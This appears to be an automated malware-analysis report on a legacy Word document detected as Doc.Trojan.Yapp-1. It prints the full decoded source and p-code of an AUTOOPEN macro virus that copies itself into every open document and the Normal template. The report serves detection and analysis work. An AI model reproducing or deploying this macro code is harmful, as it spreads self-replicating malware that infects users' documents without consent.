MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a legacy Word document containing an AUTOOPEN macro, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The macro's code attempts to copy itself to other documents, a common technique for spreading malicious macros. The presence of the AUTOOPEN macro and the legacy WordBasic marker strongly suggests a macro-based attack. The ClamAV detection as 'Doc.Trojan.Yapp-1' further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Yapp-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Yapp-1
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 42,496 bytes but its declared streams total only 20,108 bytes — 22,388 bytes (53%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AUTOOPEN" Sub MAIN()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4206 bytes |
SHA-256: bd7f12449db7a080aa6ca930937d7d07195ced484d1cc2c1cb7af606c9aa62a9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AUTOOPEN"
Sub MAIN()
'(C)CopyRight 1998.12 By Pu HongYi
On Error Resume Next
Dim NEWW, MYAPP As Document, MYAPP1, MYAPP2 As Document
Set MYAPP = Nothing
For Each MYAPP2 In Documents
If MYAPP2.VBProject.VBComponents.Count = 1 Then
Set NEWW = MYAPP2.VBProject.VBComponents.Add(1)
NEWW.Name = "AUTOOPEN"
End If
Next
If Normal.ThisDocument.VBProject.VBComponents.Count = 1 Then
Set NEWW = Normal.ThisDocument.VBProject.VBComponents.Add(1)
NEWW.Name = "AUTOOPEN"
End If
For Each MYAPP In Documents
For Each MYAPP1 In ThisDocument.VBProject.VBE.CodePanes
If Trim(MYAPP.VBProject.VBE.CodePanes(1).CodeModule.Lines(1, 1)) <> "Sub MAIN()" Then
MYAPP.VBProject.VBE.CodePanes(1).CodeModule.InsertLines 1, _
MYAPP1.CodeModule.Lines(1, 30)
End If
If Trim(MYAPP1.CodeModule.Lines(1, 1)) <> "Sub MAIN()" Then
' MYAPP1.CodeModule.InsertLines 1, _
MYAPP.VBProject.VBE.CodePanes(1).CodeModule.Lines(1, 30)
End If
Next
Set MYAPP = Nothing
Next
End Sub
' Processing file: /tmp/qstore_gcejvoxv
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1125 bytes
' Macros/VBA/AUTOOPEN - 2734 bytes
' Line #0:
' FuncDefn (Sub MAIN())
' Line #1:
' QuoteRem 0x0000 0x0021 "(C)CopyRight 1998.12 By Pu HongYi"
' Line #2:
' OnError (Resume Next)
' Line #3:
' Dim
' VarDefn NEWW
' VarDefn MYAPP
' VarDefn MYAPP1
' VarDefn MYAPP2
' Line #4:
' SetStmt
' LitNothing
' Set MYAPP
' Line #5:
' StartForVariable
' Ld MYAPP2
' EndForVariable
' Ld Documents
' ForEach
' Line #6:
' Ld MYAPP2
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' LitDI2 0x0001
' Eq
' IfBlock
' Line #7:
' SetStmt
' LitDI2 0x0001
' Ld MYAPP2
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Add 0x0001
' Set NEWW
' Line #8:
' LitStr 0x0008 "AUTOOPEN"
' Ld NEWW
' MemSt New
' Line #9:
' EndIfBlock
' Line #10:
' StartForVariable
' Next
' Line #11:
' Ld Normal
' MemLd ThisDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' LitDI2 0x0001
' Eq
' IfBlock
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld Normal
' MemLd ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Add 0x0001
' Set NEWW
' Line #13:
' LitStr 0x0008 "AUTOOPEN"
' Ld NEWW
' MemSt New
' Line #14:
' EndIfBlock
' Line #15:
' StartForVariable
' Ld MYAPP
' EndForVariable
' Ld Documents
' ForEach
' Line #16:
' StartForVariable
' Ld MYAPP1
' EndForVariable
' Ld ThisDocument
' MemLd VBProject
' MemLd VBE
' MemLd CodePanes
' ForEach
' Line #17:
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x0001
' Ld MYAPP
' MemLd VBProject
' MemLd VBE
' ArgsMemLd CodePanes 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' ArgsLd Trim 0x0001
' LitStr 0x000A "Sub MAIN()"
' Ne
' IfBlock
' Line #18:
' LineCont 0x0004 10 00 10 00
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x001E
' Ld MYAPP1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0001
' Ld MYAPP
' MemLd VBProject
' MemLd VBE
' ArgsMemLd CodePanes 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #19:
' EndIfBlock
' Line #20:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld MYAPP1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' ArgsLd Trim 0x0001
' LitStr 0x000A "Sub MAIN()"
' Ne
' IfBlock
' Line #21:
' LineCont 0x0004 01 00 DC FF
' QuoteRem 0x0008 0x006C " MYAPP1.CodeModule.InsertLines 1, MYAPP.VBProject.VBE.CodePanes(1).CodeModule.Lines(1, 30)"
' Line #22:
' EndIfBlock
' Line #23:
' StartForVariable
' Next
' Line #24:
' SetStmt
' LitNothing
' Set MYAPP
' Line #25:
' StartForVariable
' Next
' Line #26:
' EndSub
' Line #27:
' Line #28:
' Line #29:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.